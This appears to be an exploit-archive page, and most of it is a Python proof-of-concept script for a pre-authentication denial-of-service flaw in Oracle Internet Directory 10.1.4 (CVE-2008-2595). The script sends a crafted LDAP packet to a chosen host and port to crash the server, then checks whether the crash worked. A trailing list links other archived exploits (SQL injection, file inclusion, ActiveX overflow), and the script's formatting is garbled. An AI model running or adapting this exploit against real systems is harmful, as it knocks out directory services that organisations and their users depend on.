Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.
Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one
shoot, but even when you only send one packet it will crash. Tested: Win2000 x86, WinXP x86, Win2003 X86_64 Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es) Fixed: Oracle Critical Patch Update July 2008
CVEID: CVE-2008-2595
""" import sys
import time
import socket healthPacket = "0%\\x02\\x01\\x01c \\x04\\x00\\n\\x01\\x02\\n\\x01\\x00\\x02\\x01\\x00\\x02\\x01\\x00\\x01\\x01\\x00\\x87\\x0bobjectClass0\\x00"
packet = "\x30\x0e\x02\x01\x01\x60\x09\x30\x01\x03\x04\x02\x44\x4e\x80\x00" def checkHealth(hostname, port):
print " --> Wating 5 seconds"
time.sleep(5)
print " --> Connecting to target..."
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((hostname, port)) try:
print " --> Sending 'health' packet ..."
s.sendall(healthPacket)
print " --> Trying to receive something..."
data = s.recv(1024)
except:
err = sys.exc_info()[1] if int(err[0]) == 104:
print "[ ] Exploits works!"
return if data != "":
print "[!] Server is up and running :("
else:
print "[?] Server doesn't answer nothing. It works?" def oidDos(hostname, port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print "[ ] Connecting to ldap://%s:%d..." % (hostname, port)
s.connect((hostname, int(port))) print "[ ] Sending packet..."
s.sendall(packet)
s.close() print "[ ] Checking OID's health..."
checkHealth(hostname, port)
except:
print sys.exc_info()[1] def usage():
print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"
print "Copyright (c) 2007 Joxean Koret"
print "Usage:"
print sys.argv[0],"-h<hostname> -p<port>"
print def main():
if len(sys.argv) != 3:
usage()
sys.exit(0)
hostname = None
port = None i = 0
for param in sys.argv:
i = 1
if i == 1:
continue
if param.startswith("-h"):
hostname = param[2:]
elif param.startswith("-p"):
port = int(param[2:])
else:
print "Unknown option '%s'" % param
usage()
sys.exit(1)
if not hostname or not port:
print "Bad command line."
usage()
sys.exit(1) oidDos(hostname, port) if __name__ == "__main__":
main()
相關(guān)文章
- 昨晚跟@Sunshine 請教了下終端機的玩法,順便翻了翻資料??偨Y(jié)了以下的幾種方法2013-06-19
Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability
--== ========================================================= ==-- --== Wizi Wiki Wig Local File Inclusion Vulnerability ==-- --== =============2008-10-08File Store PRO 3.2 Multiple Blind SQL Injection Vulnerabilities
| File Store PRO 3.2 Blind SQL Injection | |________________________________________| Download from: http://upoint.info/cgi/demo/fs/filestore.zip2008-10-08Facebook Newsroom CMS 0.5.0 Beta 1 Remote File Inclusion Vulnerabi
##################################################################### # # Facebook Newsroom Application Remote File Inclusion Vulnerability # ######2008-10-08DreamNews Manager (id) Remote SQL Injection Vulnerability
######################################################### # # dreamnews ( rss) Remote SQL Injection Vulnerability #================================2008-10-08gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability
###################################################################################################### gapicms v9.0.2 (dirDepth) Remote File Inclusion Vulner2008-10-08phpDatingClub (website.php page) Local File Inclusion Vulnerabilit
######################################################### # # phpDatingClub Local File Include Vulnerability #=====================================2008-10-08Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Expl
<html> <body> <object classid=clsid:32E26FD9-F435-4A20-A561-35D4B987CFDC id=target /> </object> <script language=javascript2008-10-08Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
<?php /* . vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit . download: http://www.quicksilverforums.com/ . . author: irk4z[2008-10-08IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
/** ** ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit. ** ** Based on exploit by Koshi (written in Perl). This one should be2008-10-08